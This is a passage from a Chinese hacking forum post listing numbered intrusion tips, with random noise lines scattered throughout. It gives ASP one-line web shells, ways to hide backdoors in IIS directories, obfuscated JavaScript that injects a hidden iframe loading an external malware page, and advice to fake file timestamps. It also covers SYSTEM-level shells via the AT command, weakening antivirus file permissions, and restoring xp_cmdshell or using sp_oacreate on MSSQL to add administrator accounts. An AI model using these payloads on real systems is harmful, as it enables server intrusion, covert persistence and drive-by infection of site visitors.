; [: n$ @! ^0 e# X* |9 D* ?2 `7 J
b).<%Execute(request("go"))%>
5 x' z5 Y! m9 m; K: t
c).%><%execute request("go")%><%
2 W+ Q1 \* V5 ]) F, Q: W5 I r! {
d).<script language=VBScript runat=server>execute request("sb")</Script>
6 N& u4 S# W! a% f/ h
e).<%25Execute(request("l"))%25>
4 j3 B. a& V6 H8 r0 N$ ~
f).<%if request("cmd")<>"" then execute request("pass")%>
# K8 B5 o* G4 s( L$ a: [% Q
# B' c' ^3 B5 p% u/ b% H
52、at "12:17" /interactive cmd
2 Q. H' e# ?& U" B7 }
执行后可以用AT命令查看新加的任务
. T1 @- s. w8 ~( \6 G; D7 e: r3 S& q
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
# {$ Q% R5 ~( S5 L
: [ |0 g/ [* Y3 P$ q/ c% a! j
53、隐藏ASP后门的两种方法
- | I8 a( m. y4 F7 Q7 ]( W# {9 {
1、建立非标准目录:mkdir images..\
! f& Z! m' p* U, Y. v: H3 D
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
5 P6 |* s0 |+ e! l8 ~
通过web访问ASP木马:http://ip/images../news.asp?action=login
0 I0 l) o) s. T( b5 N1 G" _
如何删除非标准目录:rmdir images..\ /s
7 ^: R8 v0 y/ l9 w I- {* c. s6 ]
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
0 \6 ^( m8 P y# o' ^
mkdir programme.asp
I! x) L" {5 ]6 X2 C0 g, p
新建1.txt文件内容:<!--#include file=”12.jpg”-->
( A3 s) p& Y l" t) X
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
; ~+ @$ G6 I" z' }. o/ ]' e
attrib +H +S programme.asp
. Q4 r- B: y6 }2 N' ?) X' f! I/ C
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: [* l o+ \) {, J
7 ?" }9 O* x- K3 `9 ~4 w% g
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
1 I1 n) g, ^7 C
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
. N4 s% f; J3 e- @2 ?
$ Q6 `- j& H5 J; G
55、JS隐蔽挂马
@, M# v: c8 B) u/ j5 d: N( t
1.
( C. E k6 \/ D
var tr4c3="<iframe src=ht";
! ~% x$ B& c8 v9 o! V% v3 |7 x
tr4c3 = tr4c3+"tp:/";
; s) g- X! q6 O8 n+ ?3 R
tr4c3 = tr4c3+"/ww";
; j8 L% m3 K. h" |
tr4c3 = tr4c3+"w.tr4";
5 F+ E( o9 ~% H( `4 f
tr4c3 = tr4c3+"c3.com/inc/m";
5 {- n. h5 W0 W: M: r, z; G+ O
tr4c3 = tr4c3+"m.htm style="display:none"></i";
! u; D/ v. f7 X3 S6 X' J
tr4c3 =tr4c3+"frame>'";
4 @/ @# y8 A+ C0 P6 j! l- {
document.write(tr4c3);
0 v5 _4 q! B' a2 [3 }4 E
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
) y" k; e. t; n! K% v
/ o* U) G) i( p- E4 h
2.
1 ]: v8 P8 I t$ k* k% v& c
转换进制,然后用EVAL执行。如
' i/ w/ U% ~. c
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
4 v/ m' u0 g9 o" r8 w
不过这个有点显眼。
( p a* L5 R9 ]) w
3.
0 ]3 c0 C2 X; ^/ c
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
+ X2 f0 A$ c$ M. a9 u- z
最后一点,别忘了把文件的时间也修改下。
m, M' J: v N' l
B2 D d9 W+ F `2 [( r
56.3389终端入侵常用DOS命令
" T% |, ?8 Z% X4 W& o+ _ E0 h& O. o
taskkill taskkill /PID 1248 /t
5 e% e: C6 Y' ]
6 g5 h0 j* ^0 r; f. ?8 |3 ~
tasklist 查进程
+ N3 s; m" i2 V
' K/ \5 r3 x& O1 S, V
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
$ q2 X8 m) l5 t) ?% @3 V
iisreset /reboot
/ l& \$ o9 k; ^$ r; t& y
tsshutdn /reboot /delay:1 重起服务器
' c) w9 x5 x' D6 P
- F& H- {" n! a, |, U+ C
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
. G6 z5 E. R% v" s4 `
/ ^6 m8 }, W: k7 r- { }7 X/ c( o
query user 查看当前终端用户在线情况
- V9 L0 {3 V# t, m" J# N$ ^; f
8 U H6 V% |. F! H' m* j& S- Z
要显示有关所有会话使用的进程的信息,请键入:query process *
: d+ U+ Y5 T7 |6 w; p8 C
! W. ^) V& s: d- |* K
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
) F$ s5 z3 \" p1 V, j, Z
+ s* _5 Q+ n4 O2 u/ u' z6 o1 I
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# [7 y0 c1 K U) d6 z. D7 @# o
( ^9 P- S; c B% {6 d" k- h
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" M* _- V; p- Q$ f$ z/ y( y9 Y
/ \. l4 c: C6 u. q' K
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
8 \; m( x1 f6 L
( O$ Y7 x, p; |# U4 D6 S2 \
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
; X0 Y% r3 {6 C
6 [& r+ W7 C: m2 M, ?/ r3 `3 h& n
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
" k# B: W4 t& a" ?% p5 y
9 i7 p& ~9 W1 A- A- M
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
# Q, Z6 X* U7 _- ~: W+ G; ^5 ^/ f
& I3 o; R9 n! ]8 }0 [! ]( d1 P
56、在地址栏或按Ctrl+O,输入:
% {3 ]5 @# Q, }
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 t9 R9 f j. i+ m5 _% l
( j! w: O8 q8 \5 E; O, _( h
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
) Y, C) O# e6 X0 m0 s
E, f$ S; l. `
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
( V4 l/ g, h* L( l. q$ s/ F% c, V
用net localgroup administrators是可以看到管理组下,加了$的用户的。
9 j+ {" {1 h, Y% i9 d
' P- ^6 L) x) c
58、 sa弱口令相关命令
7 w* Q, G& e: _. V; u6 r
+ T2 R5 p% s9 l3 N; f' E
一.更改sa口令方法:
5 c4 J$ H- z0 X9 H7 d+ G' ~% m
用sql综合利用工具连接后,执行命令:
( e" T% J& ?3 ] w$ ~; ]2 g
exec sp_password NULL,'20001001','sa'
% F2 T _( g. l% x8 i: Y2 z, y! c
(提示:慎用!)
; o0 \" \& o, e
. d. Y, ^; D- s4 \ n
二.简单修补sa弱口令.
$ T6 a8 d3 i8 ?# l3 q
+ P S) p5 |* c5 A5 _$ n" s6 b
方法1:查询分离器连接后执行:
8 s% C% D" t* i1 S* t2 r
if exists (select * from
7 }- r8 M. _: E% t
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
6 G) d9 q s% Z7 ~% f) V( e& ^' J2 g
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
( p( [' e& J- F8 W( r5 y! ^
, ^% X3 q6 z$ Y* R
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
+ S: A# z- ]* {1 Q% I# v0 ^) n7 c
/ {7 F( i, R* K5 L
GO
8 \# D& G4 Q" [- {3 Y; Y
/ C4 {7 ?* p' t! h5 O
然后按F5键命令执行完毕
- i Y* E4 N/ i: @- t/ D
9 {6 Q% v1 T5 h# B
方法2:查询分离器连接后
: f. {4 \2 i0 [+ m$ H
第一步执行:use master
* m7 r7 @) r' t2 `5 d
第二步执行:sp_dropextendedproc 'xp_cmdshell'
8 D& O1 C2 ?& U
然后按F5键命令执行完毕
2 K* t( {- N6 U! z
x; r# p3 u3 ?% q/ j& o! o) U
' ~$ }" s& B" G
三.常见情况恢复执行xp_cmdshell.
3 h* z7 c" ~: R2 {! w8 J
6 N! G- C( }; k% b3 {. Q$ D
+ E) ]4 N; z2 w6 i4 u
1 未能找到存储过程'master..xpcmdshell'.
6 P+ f' W3 ]+ c4 q3 |+ ^
恢复方法:查询分离器连接后,
' y* P2 H, w" A( {
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
5 k# G h. D2 D
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 B/ _. {- _7 `! r2 k+ \- R9 S
然后按F5键命令执行完毕
( ?) }5 I. T; v( p+ T- d( @6 e
& ^1 f% i3 m# E8 ^. d
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
. L: {- n- i+ Y" t6 Y6 @, n
恢复方法:查询分离器连接后,
- H9 e2 H* L7 B8 \, P, w
第一步执行:sp_dropextendedproc "xp_cmdshell"
% u" P1 F- c' W" `$ q2 {
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# A; f9 o$ q4 L3 D3 h$ J X
然后按F5键命令执行完毕
; w3 C2 k+ Z' }. x/ d
2 U) @6 }/ D& ~2 X8 s8 ^* d; x* y5 C
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
& c1 y0 e4 M- u7 f# n6 x
恢复方法:查询分离器连接后,
% k1 Q+ x" \! o9 @' n" O
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
8 [* T. N2 p6 y
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
3 |/ x2 z. _. Z: ^: x' v
然后按F5键命令执行完毕
# b0 O- Q, h& k4 ^
* X& s X+ t4 U! _
四.终极方法.
8 K5 ?% X. X5 u0 z5 d, S
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
$ w- B% }% p' E* y
查询分离器连接后,
6 p2 ]& ]; L$ I6 f: T. x
2000servser系统:
& b! L; N) F. l) \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
% f5 D N* z, ^: f; H
" `& Y( t0 b, O6 N6 O) K* ?, Q6 O0 G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, O: j k- a2 d
7 j& a; ~# F: _/ Y& o5 \; g
xp或2003server系统:
* c8 [5 ` z8 E3 `5 F6 k
" y( R+ D; P/ r7 H3 ^6 ?* P$ W+ j9 C( G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
8 |& b. T' G2 s& t4 ?
5 ^! a. `+ f8 f- h
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: N+ m/ H1 [. i( Z8 U4 I3 @! |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2